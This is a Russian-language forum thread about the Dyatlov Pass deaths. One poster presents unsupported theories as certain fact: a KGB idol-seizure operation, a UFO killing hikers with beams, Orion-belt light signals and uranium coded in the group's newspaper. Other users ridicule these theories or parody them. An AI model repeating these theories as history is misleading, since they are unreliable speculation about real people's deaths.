Версия РИТЭГ(Г.Д.)

Автор Д Н, 05.06.2014 02:53:53

« назад - далее »

Атяпа

ЦитироватьД...Н... пишет:
ЦитироватьАтяпа пишет:
ЦитироватьNLPepper пишет:
Тогда зачем Вы привели цитату из документа про магазин от другого пистолета?
... скоро поправят и будет Вальтер П38.
Очень достоверно!
Если быть точным -цитирую специально только для Вас:

В 1944 году Главное управление имперской безопасности – РСХА (Reichssicherheitshauptamt – RSHA) заказало партию укороченных пистолетов P.38 для нужд СС, Гестапо и СД. Однако заказ был выполнен не Carl Walther GmbH, а фирмой Spree-Werke GmbH. На таких пистолетах уже не было фирменной вальтеровской эмблемы в виде флажка, такое оружие отличается клеймом «cyq». Было изготовлено несколько тысяч укороченных вариантов P.38, получивших обозначение P.38 K.

Это оружие и было у С.З.-P.38 K.
 http://antikvariat.ru/updates/3408/56583/#.VC1wn_l_unl
Всё же прежде чем приводить подробности производства и применения Вальтеров в Германии хорошо бы привести доказательства наличия Вальтера у Золотарева вообще и в походе в частности...
И днём и ночью кот - учёный!

Штуцер

ЦитироватьАтяпа пишет:
Всё же прежде чем приводить подробности производства и применения Вальтеров в Германии
Тут важен тираж. 
Представьте, если Walther PPK был бы изготовлен тиражом 1 000 000 000 экземпляров, вероятность того, что один экземпляр окажется на перевале существенно выше.  :)
Но в виде обломков различных ракет
Останутся наши следы!

Штуцер

Вообще, версия РИТЭГов кажется мне недостоверной.
Предлагаю другую.
Утерянный ядерный боеприпас, оставшийся неизвестным. (УЯБОН).
В общих чертах:
Известны многочисленные случаи утери ядерного оружия, как у нас, так и у американцев.
Наш бомбардировщик потерял бомбу, пролетая над перевалом, тогда еще не Дятлова.
ГД была направлена на поиск, разведку, анализ состояния и перспектив эвакуации.
Однако и супостаты (возможно через шпиёнов) прознали. Из Штатов была заброшена группа американских диверсантов. (ГАД).
Одним словом, к УЯБОНу добрались одновременно. В боестолкновении ГД была уничтожена.
ГАДы завладели УЯБОНом. Вывезти УЯБОН по воздуху ГАДам не удалось. Наши подняли тревогу и перекрыли воздушное пространство.
ГАДы решили эвакуировать УЯБОН по суше. Американские ВВС самолетом У-2 сбрасывали по пути следования продовольствие, батарейки и транквилизаторы для повышения сил. Кратчайший путь, чтобы покинуть территорию СССР, пролегал через Новую Землю к Северному полюсу. За полюсом или у него ГАДов с УЯБОНом должна была забрать всплывшая специальная автономная подводная лодка, ядерная (САПЛЯ).
ГАДы двигались ударными темпами и наши группы оперативного перехвата (ГОП) не могли их догнать и перехватить.
Когда ГАДы с УЯБОНом были в районе Новой Земли, ГОПы доложили в Москву, что не догоняют, а САПЛЯ уже циркулирует вокруг СП.
Тогда из Москвы инициировали УЯБОН по радиоканалу через самолет-ретранслятор.
УЯБОН взорвался, ГАДы испарились, САПЛЯ была вынуждена вернуться в Штаты. ТАСС заявил об успешном плановом испытании ядерного боеприпаса на Новой Земле.
Но в виде обломков различных ракет
Останутся наши следы!

Атяпа

Вышеизложенное подтверждается документом:

"замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", 
"замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", 
"замазано", "замазано", "замазано", "замазано", "замазано". 

Д Н

ЦитироватьАтяпа пишет:
Вышеизложенное подтверждается документом:

"замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано",
"замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано", "замазано",
"замазано", "замазано", "замазано", "замазано", "замазано".
Если известно, о чем идет речь, то все ясно. Если не известно, о чем идет речь, то речь идет о деньгах..

Вам помочь или не мешать?

В хорошем разговоре не все говорится. (Китайская мудрость)

Д Н

Звенья одной цепи в спец-операции =ХИБИНА=

Предисловие. 
Немного о себе-родился 12 апреля 1961года в небольшом посёлке на Среднем Урале .
Занимался кордовым авиамоделизмомв 7 классе ,выписывал компрессорные авиамодельные двигатели Ритм,МК-17,через посылторг г.Москва
Топливо-керосин,авиационное масло,эфир
Радиолюбительство в 8 классе-детекторные приёмники,мини-передатчики на кроне,ламповые передатчики на 6П3С -приставки к радиолам-дальность на СВ 10 км на пол посёлка хватало(радиохулиганство))
В 9 классе астрономия и изготовление в начале из очковых линз  телескопов а дальше уже полноценного прибора рефлектор с диаметром зеркала 200мм изготовленном(шлифовал) самостоятельно по книжке.
Рефлектор и рефрактор Вам наверное -всё едино ).
Занялся астрофотографией -снимал луну,планеты.
Короче глубокой ночью когда мои сверстники возили на мопедах девок по посадкам и кустам..
Я в безлюдном и тёмном переулке ставил телескоп и часами смотрел Юпитер со спутниками,Сатурн с кольцами,Марс и туманности Ориона,Андромеды и т.д.и т.п.
Больше всего мешали прохожие и пьяные а что это и т.д.и т.п.
Поэтому я Игоря Дятлова понимаю лучше Вас-за знания мы готовы отдать всё,умный был парень и знал что делает.
А теперь к делу.
Большая ошибка исследователей Т.Г.Д.в (зацикливании) на мелочах..
 У Вас нет понимания общей картины Т.Г.Д.
  Но Время всё расставит по своим местам.

Вот они  =Звенья одной цепи=

1). Спец-операция КГБ СССР по изьятию у шаманов манси(хантов)- (статуэтки идола)
имевшего огромную ценность для науки и ВПК.
2). С.Золотарёву (агенту КГБ СССР) лично видевшему фото и знавшего описание идола-поручено его выполнение.
3). С.З.внедрён в Г.Д.под видом туриста (И.Дятлов знал только часть плана)
4). Г.Д. идеально подходила под (наивных)туристов-без оружия (хотя в прежнем походе у них был охотн.карабин)
две девушки(певуньи)+(мандолина) не вызывало подозрений.
5). С.З. имел при себе немецкий пистолет ППК-Вальтер-(скрытно).
6). Невнятный(несуразный) уход Ю.Юдина с маршрута (приказали или дали -нужных-таблеток) целью было заменить Ю.Ю.на (своего) и 
 в десятером  закончить маршрут(вот откуда лишняя пара лыж).
7).Момент окончания записей в дневнике группы и есть встреча с (10 и перевод группы под командование С.З.) отсюда и название группы(операции) -Хибина-
8).Изьятие -идола- прошло успешно и группа поставила палатку на склоне Х.Ч.
9).(=10=) ушёл с -идолом- перепрятать и должен был вернуться поздно ночью или под утро..
С.З.ушёл в дозор и был в засаде.
10).Во время ужина рядом с палаткой зависло =нечто= через брезент палатки ударил конусообразный луч и стал (шарить)по палатке,наспех сделав снимок в палатке этого луча( ф.а.- 34кадр)
у ребят нарастал ужас-луч невыносимо физически! давил и изнутри жёг  попадавших под него-Г.Д.режут палатку в противоположной от опасности стороне и наспех выбегают из палатки.
11).Оценив опасность решают покинуть палатку-луч продолжает преследовать их (как бы толкая и выжигая изнутри)очень жарко и снег плавиться под ногами(оставляя следы-столбики)светло как днём -а ребятам становиться всё хуже и хуже-
пытаются петлять уходя от луча но он не отстаёт..
12).В мозгу ребят всплывает =верните что взяли=они понимают эти муки за =идола=
Значит обьект разумен но и они не знают где его спрячет 10.
13).Передышка- луч и обьект изчез-С.З.видевший всё в укрытии внизу присоединился к ребятам-срочно разжечь костёр на видном месте(условный сигнал SOS)и потом все силы брошены на (партизанскую лёжку)где можно укрыться до подхода помощи.
14).Но Погода резко меняется -шквальный ветер и мороз=пробирает до костей ,ощущения как все минус 50.
15).Трое пытаются вернуться к палатке и взять тёплые вещи -обьект их останавливает (обездвиживает) и только у И.Дятлова в глазах предсмертное удивление (необычным обьектом и его сверх-возможностями)..
16).Обьект вернулся к 2 оставленным для поддержания сигнального костра-удар луча по спрятавшимся на дереве двоим так силен что они ломают толстые сучья своим телом и их швыряет в костёр..
17).Мороз вынуждает С.З.осторожно вернуться к костру и срезать одежду с убитых..
18).Тщательно заметая следы он возвращается к настилу и раздаёт одежду.
19). Вдруг по лесу движутся много огней(как карманные фонарики)  на уровне роста человека (мелькнула надежда свои) но нет движения слишком быстрые и они реагируют на взгляд человека-(самонаведение)..
20).С.З.командует не смотреть на огни и срочно всем покинуть настил но поздно их убивает обьект ломая лучом рёбра изнутри не повреждая кожу.
21).Под утро пришёл =10=поняв что произошло ч.п. но в надежде что кто-то выжил оставляет  включённым к.фонарик на скате палатки а сам до рассвета прячется в стороне... Позже  он пропал без вести или возможно сбежал ..
22).Стенгазета предназначалась ему и органам КГБ СССР.
23).Оплавленное место рядом с палаткой-34 кадр ф.а.-(чистая радиация),цвет кожи,одежды,пена из рта,страшные переломы без повреждения кожи,внутренестей,рассказы манси что огненый шар скинул их (Г.Д.)с горы,свидетели видевшие эти о.ш.-
Н.Л.О. появившееся позже и распугавшая поисковиков до смерти,следователь Л.Иванов будучи уже в (ранге прокурора района!!!)утверждавшего их убили О.Ш.
неслыханные масштабные поиски КГБ и С.А. СССР,ну и слишком  высокие чины занимались этим (самым заурядным)делом и многие в КГБ СССР лишились своих (тёплых) мест..

P/S

Как только стало известно что немецкая разведка в 1936 году активно собирала данные об =идоле=на Урале так называемой Золотой Бабой-сразу подключилось НКВД и все годы вплоть до 1959г.гонялось за шаманом-хантом хранителем З.Б.прикрываясь поимкой дезертира от призыва в С.А.
Но шаман уводил их топи и не давался в руки..
И только по болезни шаман-хант решился передать идола шаманам-манси в 1959г.и КГБ СССР решило этим воспользоваться и провело(провалило) операцию =ХИБИНА=...

Ну-и-ну

Немного о себе-родился 12 апреля 1961года
Защитит ли от бана?

Евгений Румянцев

Короче глубокой ночью когда мои сверстники возили на мопедах девок по посадкам и кустам..
Я в безлюдном и тёмном переулке ставил....
Вот такая пошлятина :)

Эх... лучше бы Вы на мопеде научились кататься...

Клон Антипода

В 9 классе астрономия и изготовление в начале из очковых линз телескопов а дальше уже полноценного прибора рефлектор с диаметром зеркала 200мм изготовленном(шлифовал) самостоятельно по книжке.
Рефлектор и рефрактор Вам наверное -всё едино ).
Занялся астрофотографией -снимал луну,планеты.
Книжку-то может и читали, а остальное на враньё похоже. Где вы в деревне взяли подходящие стёкла на 200 мм зеркало и шлифовальник? Их и в городе-то фиг достанешь. Где напыляли зеркало? Или, может, расскажете сказку про серебрение в домашних условиях? Типо, бидистиллят гнали самогонным аппаратом, ложки в кислоте растворяли. Монтировку для такого прибора из говна и палок не сделать. А без монтировки от него толка ноль. Нужны как минимум токарные работы, сварка. В сарае точили и варили? 

Фото вашего прибора - в студию. Или вы астрофотографией занимались, а телескопчик сфоткать забыли?
Knowledge is power. (c) Francis Bacon
Absolute power corrupts absolutely.   (c) Edward Dalberg Acton

Д Н

ЦитироватьКлон Антипода пишет:
Где вы в деревне взяли подходящие стёкла на 200 мм зеркало и шлифовальник?
Во первых не деревня а посёлок П.Г.Т. во вторых  г.Свердловск недалеко и  у Вас нет понятия в оптике-

Берутся 2 абсолютно одинаковых стекла и шлифуются с добавлением абразива -начиная с крупного и т.д.

Потом идёт полировка ..
Главное структура стекла должна быть однородна без пузырей и сколов.
Монтировку для такого прибора из говна и палок не сделать
Проще простого-монтировка Добсона-раз плюнуть ,эх Вы горе астроном)

Атяпа

Протестую!
А где РИТЭГ и американские шпионы?

Клон Антипода

Где вы в деревне взяли подходящие стёкла на 200 мм зеркало и шлифовальник?
Во первых не деревня а посёлок П.Г.Т. во вторых г.Свердловск недалеко и у Вас нет понятия в оптике-

Берутся 2 абсолютно одинаковых стекла и шлифуются с добавлением абразива -начиная с крупного и т.д.

Потом идёт полировка ..
Главное структура стекла должна быть однородна без пузырей и сколов.
Монтировку для такого прибора из говна и палок не сделать
Читать умеете, не? Отвечайте на вопросы по существу, фото в студию, или вы болтун.
Knowledge is power. (c) Francis Bacon
Absolute power corrupts absolutely.   (c) Edward Dalberg Acton

Александр Бойков

Читать умеете, не? Отвечайте на вопросы по существу, фото в студию, или вы болтун.
 Во первых не деревня а посёлок П.Г.Т. во вторыхг.Свердловск недалеко иу Вас нет понятия в оптике-
:D Поначитался "умных" книжек да разбил пару стекл для порядку, вот и фотку где-нибудь сопрёт наш юный астроном -  любитель

Д Н

Цитироватьalgol57 пишет:
Поначитался "умных" книжек да разбил пару стекл для порядку, вот и фотку где-нибудь сопрёт наш юный астроном -любитель
Конечно -спереть- с инета  фотку  легче простого-но от 1976года у меня есть коробка с негативами но найти и  оцифровать нужна будет  спец-рамка под плёнку и  хороший сканер.
А я сейчас занят ремонтом в доме и тратить время для Вас специально не намерен ..
По Вашей логике я должен и кордовую модели выложить фотку- где то валяется я тоже могу  выложить и написать плакат -Клон Антипода вы= болтун= или матом)
Сечас у меня есть фабричный 2 телескоп Advanced C6-N с Параболическим зеркалом-Вы понимаете разницу между сферическим и параболическим зеркалом?

А пока выложу фотки телескопа  1 фабричного Фансиер со сферическим зеркалом а Вы докажите мне что я это стырил с инета- вот  я посмеюсь над Вами..

Д Н

ЦитироватьАтяпа пишет:
Протестую!
РИТЭГ и  установлены в обьекте т.к.н.з. нло или Вы думаете они на (резино-моторах летают).

Американские шпионы есть и не только они..

Дополнения:
--------------------------------------------------------
Б/Л

СПОРТ

Команда радиотехников в составе тов. Дорошенко и Колмогоровой установила новый мировой рекорд в соревнованиях по сборке печки — 1 час 02 мин. 27, 4 сек.

Орган издания профсоюзной
организации группы "Хибина"
----------------------------------------------------------------------

Расшифровка:

Карте соответствующим точкам Д. и К.установлен новый медный корд под бочкой (1 час 02 мин. 27, 4 сек)

Вот карта (схема)где все пометки сделаны Г.Д. и только ими.Поисковики здесь не причём.

Три крестика и большой крест -это не трупы и вертолётная площадка..

(.Тр ) (мой ответ будет позже..)

Цитата:
=Из СМЭ Николая Тибо:
На левом предплечье двое часов: спортивные часы, которые показывают 8 часов 14
минут 24 секунды. Часы "Победа" показывают время 8 час.39 минут. Все таки в их практически одинаковых показаниях есть некоторая закономерность.=

1).Двое часов на руке Тибо для точной фиксации промежутка времени и страховки от сбоя.
И эта информация была ценной.. Точно.
2).Штатив для Ф.А.используется для сьёмок с большой выдержкой и недостаточной освещённости.Так снимают молнию ночью.Точно.
3).Пометки на схеме/карте сделаны И.Дятловым и С.З. -поисковикам дали бы (шапке) за порчу карты.Точно.
4).Отход Г.Д. к кедру был не случайным а запасным вариантом-посмотрите карту.
5).Разрезанная лыжная палка на равные части с канавками нужна была для укладки медного корда см.схему.
6).Угадайте что означают буквы К.Д. и 3 крестика + центральный большой.Значок радиация,значок Т.р...
7).На Отортен Г.Д. и не думала подниматься-они были уже на нужном месте.
 8) .По 34 кадру (судмедэксперт) никогда не снимает на Ф.А. потерпевшего (иначе получит в тык + черевато браком снимков)
9).Так почему Л.И. назначил экспертизу на радиоактивность Г.Д. и получил за это (по рукам)?

Д Н

http://taina.li/forum/index.php?topic=1351.msg37358#msg37358 

http://urbibl.ru/Stat/Pereval_Dyatlova/o_chem_molchit.htm 
 цитата:
Примерно дней через 10 после начала следствия Иванова отозвали в Свердловск, а затем командировали на несколько дней в Москву. И вот, когда он вернулся, мы его не узнали. Это был совсем другой следователь, который уже ничего не говорил ни про убийство, ни про «шары». А нам часто стал советовать одно: «Поменьше трекайте языками...»...

http://taina.li/forum/index.php?topic=1974.msg64756#msg64756 
http://taina.li/forum/index.php?topic=2293.msg93413#msg93413 
http://taina.li/forum/index.php?topic=97.msg105743#msg105743 
 цитата:
"... Когда совместно с прокурором области я доложил начальные данные первому секретарю об-кома партии Л. П. Кириленко, тот дал четкую команду – всю работу засекретить и ни одного слова информации не должно было просочиться
цитата:
А следствие-то вести надо, я же профессиональный криминалист и должен найти разгадку. Я все же решил, несмотря на запрет, с сохранением высшей степени секретности поработать над этой темой,
 цитата:
Сговорившись с учеными УФАНа (Уральского филиала Академии Наук СССР), я провел очень обширные исследования одежды и отдельных органов погибших на "радиацию".
 цитата:
Допросил много очевидцев пролета, зависания и, попросту говоря, посещения неопознан-ными летающими объектами Приполярного Урала..."

https://sites.google.com/site/hibinaud/home/soobsenie-grazd-piguzovoj 

https://sites.google.com/site/hibinaud/home/dopros-svidetela-savkina 

https://sites.google.com/site/hibinaud/home/dopros-svidetela-novikova 

https://sites.google.com/site/hibinaud/home/dopros-svidetela-malik-1 

https://sites.google.com/site/hibinaud/home/soobsenie-gr-averburg 

http://taina.li/forum/index.php?msg=120553 
Цитирование 
РАССКАЗ РАДИСТА 

В Ивделе познакомились мы с Любимовым Владимиром Алексеевичем, работавшим в те времена радистом. В конце 1958 года Владимира Алексеевича вдвоем с женой отправили зимовать под гору Ярута. Это в 200 км на север от перевала Дятлова. Летом геологи под Ярутой искали полезные ископаемые и оставили на зиму несколько тонн взрывчатки. Владимир Алексеевич должен был до тепла охранять это добро и сообщать по рации о своих делах. А незадолго до этого в селении Саранпауль в Приполярном Урале изобличили шпиона. У него была рация. И по ночам, уходя из дома якобы на работу, лазутчик передавал врагам секретные сведения. Его жена заподозрила факт измены и написала о том в партком. Товарищи стали за ним следить на предмет порочности, а нечаянно изобличили лазутчика! 

- После этого, - вспоминает Владимир Алексеевич, - всем нам, радистам, было приказано прослушивать эфир и сообщать о всяких подозрительных переговорах. И вот, в январе или в феврале, уж сложно сказать, я прослеживаю эфир на разных волнах и слышу какие-то очень странные переговоры на неразборчивом эзоповом языке. Ясно только, произошло что-то страшное. Я, конечно же, доложил начальству. А через сутки получаю команду: прослушку на данной волне прекратить! Но мне любопытно было, и я стал тайно дальше прослушивать. Помню, что говорили - никак не найдем двоих. Ищем еще двоих... 

- Может, речь шла о четверых? - уточнили мы, поскольку тела четверых обнаружили только в мае. 

- Возможно, - задумался он, - что говорилось о четверых. Теперь уже трудно вспомнить... Когда я вернулся с зимовки, то отыскал радиста, который все это передавал. То был мой приятель Егор Неволин. Попросил его рассказать подробности. Но Неволин ответил, что не имеет права. Тогда были времена секретности. Я думаю, что на ребят было воздействие каких-то отравляющих газов. Иные трупы были найдены с пеной во рту, что свидетельствует об отравлении. 
Очень интересен момент в интервью Д.Милькову связанный с КГБ 

Цитирование 
1. В июне месяце, примерно 15-17 числа, ровно в 05.36 над Ярутой, со стороны Верхщугорской метеостанции появился вертолёт МИ-1. По подлёту на посадочную площадку, было видно, что вертолётчик здесь впервые. 
Первым у вертолёта оказался я. Вышел пассажир. Идём друг другу навстречу. Он показывает книжечку красного цвета – Капитан КГБ, тюменского УГБ. 
(ф.и.о. не запомнил) 
Вопрос – «Где можно видеть радиста?» 
Отвечаю – «Я - радист» 
Просит пройти на рацию. Вопросы самые простые, но замечаю, что не за этим он прилетел. Заходит Китаев. Знакомится. 
Капитан Китаеву – «Вы посидите здесь, а вы Владимир Алексеевич, выйдете со мной». 
На улице вопрос – «Владимир Алексеевич, с какой стороны летели огненные шары и что они из себя представляют?» 
Ответ – «Простите, но кроме луны и северного сияния, я ничего не видел». 
Капитан – «Вы уверены, что видели естественную луну?» 
Ответ – «Двойников не видел. Правда, солнышко на сильном морозе бывает двойное». 
Капитан – «Ну что же, подписку, я думаю, брать не надо». 
Ответ – «Думаю, не надо. У меня, товарищ капитан, неразглашение на 25 лет и допуск два «С». 
Не простившись с начальником партии, капитан улетел. 
В некотором роде - это сенсация. Мы впервые узнаем, что КГБ интересовали Огненные шары и ведь, узнав что Любимов шары не видел, капитан подписку брать не стал. Складывается впечатление, что КГБ знало о природе ОШ. Вопрос поставлен с подвохом не так, что мол видели ли вы какие-либо ОШ, а именно сотрудник КГБ спрашивает 

«Владимир Алексеевич, с какой стороны летели огненные шары и что они из себя представляют?». 

http://taina.li/forum/index.php?msg=119857 

Это всё подтверждает мою версию= Звенья одной цепи в спец-операции =ХИБИНА=

Ищу соавтора.Есть новости.

Д Н

ЦитироватьАтяпа пишет:
Протестую!
Продолжение: Звенья одной цепи в спец-операции =ХИБИНА=
 =Пояс Ориона=

Максимально коротко для Вас.

1). Спец-операция КГБ СССР по изьятию у шаманов манси(хантов)- (статуэтки идола)
имевшего огромную ценность для ВПК.Все попытки силой отнять и устраивать погони -были бесполезны .
С.Золотарёв тайный агент КГБ СССР с легендой (зэка-фиксы,татуировки,чужое имя и т.д и т.п.)
ТРИ Основания для таких выводов :
a)Цитата Л.Дубинина:= инструктора Золотарева А, идущим вместе с нами в поход. Этого Золотарева никто не хотел сначала брать, ибо человек он новый, но потом плюнули и взяли, ибо отказать - не откажешь.=
http://taina.li/forum/index.php?topic=100.0
б)Родные С.Золотарева говорят у него не было фикс и татуировок ..
в)Похоронен С.З. отдельно на элитном кладбище и только матери  С.З. на вертолёте показали место гибели Г.Д.(персонально)
2).Местный лесник кличка(Леший) за золотой песок- согласен указать бывшему (ЗКа) С.З. место тайника шаманов..
3).Придя на место Х.Ч. группа Г.Д. столкнулась с неизвестными Л.А.и О.Ш.и огнями..
4).Решили поставить палатку (Н.П.)на склоне и другой наблюдательный пункт на кедре (окно) там же рядом в овраге была сделана (партизанская лежка)он же настил(для одного наблюдателя)
Вместе они  (Н.П.) образовали одну прямую для фото и точной временной фиксации появления огней.
5).Посмотрите карту Г.Д. там в центре отмечены (крестиком) три места появления малых огней через каждые 27,4 сек и одного мощного через 1 час 02 минуты.(большой крест ниже)Три крестика и большой крест -это не трупы и вертолётная площадка как думали многие..
6).Г.Д. вели сьёмку Ф.А. со штатива в палатке и напротив вёл сьёмку Ф.А.с (окна)на кедре  С.З.
7).Вместе эти огни (сигнальные) образуют пояс Ориона(всеми узнаваемый ).Г.Д.зашифровала это  в Боевом листке.
Цитата: Б/Л
=СПОРТ
Команда радиотехников в составе тов. Дорошенко и Колмогоровой установила новый мировой рекорд в соревнованиях по сборке печки — 1 час 02 мин. 27, 4 сек.
Орган издания профсоюзной
организации группы "Хибина"=
Примерный перевод такой:
Срочно.Идут Команды по радио и визуально состоящие из Длинных и Коротких световых импульсов для установления с новым миром связи -в точке (Д) через -1час 02 и в трёх точках (К) через 27,4 сек.(см.карту )(Двоичный код)
Цитата:
=Из СМЭ Николая Тибо:
На левом предплечье двое часов: спортивные часы, которые показывают 8 часов 14
минут 24 секунды. Часы "Победа" показывают время 8 час.39 минут.=
Двое часов на руке Тибо для точной фиксации промежутка времени .

8).Помните фразу из радио-переговоров на перевал села ракета(тогда слово нло не знали )Обьект напал на палатку и лучом (прожёг мелкие дырки в палатке)эти куски брезента позже были выдраны и сданы в КГБ СССР.
Обьект пролетел над палаткой и сел рядом-заставив Г.Д. аварийно покинуть палатку и отступить к кедру где их ждал С.З.
Разведя сигнальный костёр и оставив 2  дежурных четверка Г.Д.укрылась в овраге на настиле.Остальное Вы уже знаете.
9).КГБ СССР подняло всех на ноги (т.к. были основания считать появление н.л.о. в этом районе американской разведкой на захваченном Л.А.(Розуэльский обьект) а также =идол=чаша Грааля= пропали и  поэтому до сих пор не спадает интерес к трагедии Г.Д. многих спец-служб а и не только нас с Вами..

http://skif.wmsite.ru/A-N-Novikov/PO/VSEMU/URALU/NASTAVIL/YA/VOPROSITELNYH/ZNAKOV/2013
http://vk.com/topic-27134005_27572609

P/S 

Именно пояс Ориона  стал эмблемой посвящённых в связи с В.Ц.
Три звезды в линию и туманность Ориона под ними(крупная звезда)
Нет сомнений что именно эта эмблема в будущем(да уже и сейчас) красуется на флагах и оф.документах по связям с В.Ц.
Другого нам уже  не дано...

Данные  версии является моей собственностью и прошу Вас указывать автора или можно пригласить меня в соавторы.

Атяпа

В общем Г. Адамов "Тайна 2 океанов"...

Д Н

Внимание!Новые данные. 

Перевод В.О. 

"ВЕЧЕРНИЙ ОТОРТЕН" №I 
1 февраля 1959г. 
Орган издания профсоюзной организации группы "Хибина" 

Передовица 

Встретим XXI съезд увеличением туристорождаемости! 
Встретим .. сьезд увеличением урановых месторождений! 

СПОРТ 

Команда радиотехников в составе тов.Дорошенко и Колмогоровой установила новый мировой рекорд в соревнованиях по сборке печки - 1 час 02 мин. 27,4 сек. 

Команда с радиометром нашла месторождение урана состоящее из двух точечных месторождений урана отмеченных на карте точками Д. и К. 
(первая часть) 02 р/ч (вторая часть) 7,4 р/ч. 

На карте мной выложенной эти точки указанны и отмеченны.. 

Часы секундомер нужны были для отсчёта времени( щелчков радиоактивности )(мин) схема простейших (носимых полевых вес меньше 1 кг.время работы до 150 часов) дозиметров опубликованны в Радио 1956 !г.№10 там есть схема и от динамо -машинки..(вечный дозиметр) 

Само слово Уран в те годы было запрещено было даже называть.. 

Группа Г.Д. нашла локальные очаги супербогатые ураном(т.к. н.з. урановые линзы) 

По тем временам это было Важнее даже золота.. 
Страна остро нуждалась в урановых месторождениях.. 
Явно были (чужие) поэтому и зашифровали данные в В.О. 
Данные версии является моей собственностью и прошу Вас указывать автора или можно пригласить меня в соавторы. 
См.Ссылки. 
http://sibirica.su/glava-pervaya/uranoviy-chelovek 

Ну Вы и народ.. 
Я Вам даже схемы привёл из Радио 1956г. проблем с дозиметрами и самодельными и промышленными тогда не было... 

А вот найти уран мечтали многие и геологи и туристы .. но мало кому везло.. 

Какой на хрен Отортен когда такой (подарок) Родине -вот это достойно В.О. ай да Г.Д.! 

Цитата:http://www.lib.ru/BRODSKIJ/wolkow.txt_Piece40.02 

Хотелось найти уран, естественно. Чтобы потом... Ну понятно, 
зачем нам уран был нужен. Никаких сомнений на этот счет быть не могло. И 
между прочим однажды, на Дальнем Востоке, я даже нашел месторождение урана - 
небольшое, но нашел. 

Главным образом, всякие геологические приборы. Поскольку это 
была разведка на уран, то дозиметрические приборы. Сначала счетчик Гейгера, 
для измерения радиации, потом более усовершенствованные приборы, довольно 
толковые, с такой замечательной шкалой, которая давала приблизительные 
показания о степени радиоактивности той или иной породы. Вот вы спросили о 
впечатлениях от северного пейзажа. Я его видел, но совсем не в том ключе. 
Воспринимается этот пейзаж исключительно в функциональном плане, поскольку 
эстетически совершенно не до него. 

Прибывший на место происшествия Абрам Константинович Кикоин, обследовал местность трагических событий на радиоактивность, привезенным с собой из Института прибором . 
https://sites.google.com/site/hibinaud/home/zaklucenie-eksperta 

Спойлер
Спойлер
Скрытый текст
[свернуть]
Спойлер
Показать/скрыть 
[свернуть]
Спойлер
Чтобы был понятен существовавший ранее уровень секретности, приведу такой факт. Ленинскую премию нам вручали на закрытом заседании в Кремле. В президиуме было больше народу, чем в зале. Кроме нас, эту высокую награду получали также технологи атомщики и конструкторы космических кораблей. Вызывали к трибуне только по имени отчеству. Фамилий вообще не называли. Примечательно, что в дипломе лауреата нет ни единого слова об уране. 
[свернуть]
Спойлер
Это раньше нельзя было произносить даже вслух само слово. Но чиновничий аппарат так и продолжал жить по прежней схеме. Вспоминаю, как в те годы в Краснокаменск приехал глава Средмаша Ефим Павлович Славский. Он выступал на активе, где всегда были люди с особой формой допуска. Но в тот раз на него пригласили и передовых рабочих. А у них только «третья форма». Во всех дверях стояли первоотдельцы. А Славский выступает и вдруг начинает сыпать с трибуны конкретными цифрами по урану. Называя объемы и по комбинату, и по Союзу. Я тогда толкнул соседа по президиуму и говорю: смотри, у режимщиков волосы дыбом встали. 
[свернуть]
Спойлер
Потом на банкете мы сидели с Ефимом Павловичем напротив. Я у него своеобразным «любимчиком» был. И где-то после пятой чарки решился спросить о неожиданном откровении на активе. А он наклонился ко мне и говорит на ухо: «Знаешь, Володь, вся режимность была нужна, когда у нас урана не было. И необходимо было сделать все, чтобы наши противники не узнали, что его у нас нет. А теперь уже не страшно. Уран теперь есть у нас в достатке». 
[свернуть]
Спойлер
Это очень сильные люди. Но их вклад в создание ядерного щита был незаслуженно обесценен новой властью. Когда вручали Ленинскую премию, в наш адрес прозвучали слова: «Благодаря вашим открытиям удвоилась оборонная мощь страны. Родина этого не забудет!» А на самом деле очень короткой оказалась память у «родины». Мы работали в тяжелейших условиях. Почти все время «в поле». И для многих тогда несбыточной мечтой казалось иметь свой домик с маленьким садиком. Это потом стало ясно, что вся наша «жизнь» была ориентирована на нужды войны. Настоящая, счастливая жизнь оказалась на втором плане. 
[свернуть]
Спойлер
Но я ни о чем не жалею. Мне повезло. Моя звезда удачи была ярче. Говорю о тех, кто был на самых тяжелых работах. Говорю о тех, кто уходил на пенсию в 45 лет. А затем они по новым законам остались без стажа. По ним ударили больнее всего. Они вынуждены сегодня работать вахтерами. И это — как раз те, кто строил державу. Кто сделал под землей 24 рекорда СССР по скоростной проходке. 
[свернуть]
Спойлер
Раньше высочайшим достижением было 300 метров в месяц. А мы прошли 1222. Но никто так и не узнал, что это достижение принадлежало уранщикам. Ведь они творили под землей чудеса. И все это так и осталось под покровом секретности. Кто сегодня знает, что для того чтобы заработало Стрельцовское месторождение, под землей было пройдено расстояние в три московских метрополитена?! И эти люди в результате оказались обворованными государством. С жалкой пенсией. 
[свернуть]
Спойлер
У «обычных» геологов зарплата была на двадцать процентов меньше, чем у нас. Вот и вся разница. Когда обнаруживали проявления урана, только тогда мы начинали чувствовать свою исключительность. Тут же нам доставляли сервелат, колбасу в бараньем жиру ... Начинали строить лагерь и привозить заключенных для быстрого разворота работ. Но как только надежды на уран не оправдывались, все сворачивалось. И нашей традиционной пищей вновь становилась каша с тушенкой. Жили мы все годы плохо. Я долгое время вообще не имел своего угла. Проходную комнату получил, будучи уже начальником партии, когда открыл рудные провинции. К этому времени я уже был семейным человеком и у нас рос ребенок. 
[свернуть]
Спойлер
Это расхожая выдумка. Ни один заключенный в урановых шахтах не работал. Их использовали только на поверхности. В сталинское время «зэки» иногда работали под землей. Но на Стрельцовском месторождении – никогда. В Краснокаменске были задействованы осужденные из числа убийц, насильников, грабителей с отягчающими обстоятельствами... Особорежимный лагерь. Вот это – правда. Знаю это не понаслышке. По долгу депутата местного горсовета я одно время возглавлял наблюдательную комиссию за режимом в лагерной зоне Приаргунского уранового комбината. 
[свернуть]
Спойлер
— Есть еще одна скрытая страница истории: самоубийства среди «урановых людей». Почему они уходили из жизни таким путем? Тем более что многих из них вы хорошо знали лично... 
[свернуть]
Спойлер
— Когда работали — все было, как натянутая струна. Экстремальные условия. А в напряженной работе лучше всего проявляется стиль руководства. К сожалению, он во многом был крайне безнравственным. А чванство и хамство командиров производства приводит к равнодушию подчиненных и... к трагедиям. 
[свернуть]
Спойлер
